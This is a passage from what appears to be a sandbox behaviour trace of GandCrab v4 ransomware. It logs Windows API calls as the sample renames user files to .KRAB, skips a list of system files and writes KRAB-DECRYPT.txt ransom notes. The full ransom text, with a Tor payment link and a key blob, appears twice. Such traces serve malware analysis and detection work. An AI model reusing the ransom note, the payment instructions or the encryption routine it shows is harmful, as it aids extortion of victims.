"c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\outlook\\outlook.xml.krab")) returned 1 [0061.682] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.683] FindNextFileW (in: hFindFile=0xfbd1a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0061.683] FindClose (in: hFindFile=0xfbd1a0 | out: hFindFile=0xfbd1a0) returned 1 [0061.683] CloseHandle (hObject=0x3ac) returned 1 [0061.683] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0061.683] lstrcmpW (lpString1="PowerPoint", lpString2=".") returned 1 [0061.683] lstrcmpW (lpString1="PowerPoint", lpString2="..") returned 1 [0061.683] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="PowerPoint" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint" [0061.683] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\" [0061.683] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0061.683] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0061.684] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0061.684] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0061.684] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0061.684] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.684] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.684] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\\\KRAB-DECRYPT.txt") returned 76 [0061.684] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\powerpoint\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0061.685] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0061.685] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0061.686] CloseHandle (hObject=0x3ac) returned 1 [0061.686] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.686] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.686] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x8, wMilliseconds=0x373)) [0061.686] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.687] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0061.687] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0061.687] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\d2ca4a08d2ca4dee3d.lock") returned 82 [0061.687] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\powerpoint\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0061.687] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.688] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.688] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned 59 [0061.688] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\*" [0061.688] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd960 [0061.688] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.688] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.688] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.688] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.688] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.688] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0061.688] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0061.688] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\d2ca4a08d2ca4dee3d.lock" [0061.688] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.689] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 87 [0061.689] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\d2ca4a08d2ca4dee3d.lock") returned 82 [0061.689] lstrlenW (lpString=".lock") returned 5 [0061.689] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.689] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0061.689] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.689] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.690] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.690] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0061.690] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0061.690] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\KRAB-DECRYPT.txt" [0061.690] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.690] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\KRAB-DECRYPT.txt.KRAB") returned 80 [0061.690] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\KRAB-DECRYPT.txt") returned 75 [0061.690] lstrlenW (lpString=".txt") returned 4 [0061.690] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.690] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0061.690] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.691] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\KRAB-DECRYPT.txt") returned 75 [0061.691] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\KRAB-DECRYPT.txt") returned 75 [0061.691] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0061.691] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0061.691] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0061.691] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0061.691] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0061.691] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0061.691] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0061.691] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0061.691] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0061.691] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0061.691] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.691] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0061.691] FindClose (in: hFindFile=0xfbd960 | out: hFindFile=0xfbd960) returned 1 [0061.691] CloseHandle (hObject=0x3ac) returned 1 [0061.692] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0061.692] lstrcmpW (lpString1="Proof", lpString2=".") returned 1 [0061.692] lstrcmpW (lpString1="Proof", lpString2="..") returned 1 [0061.692] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Proof" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof" [0061.692] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\" [0061.692] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0061.692] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0061.692] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0061.692] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0061.692] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0061.692] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.693] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.693] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\\\KRAB-DECRYPT.txt") returned 71 [0061.693] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\proof\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0061.694] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0061.694] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0061.695] CloseHandle (hObject=0x3ac) returned 1 [0061.695] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.696] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.696] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x8, wMilliseconds=0x383)) [0061.696] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.696] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0061.696] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, 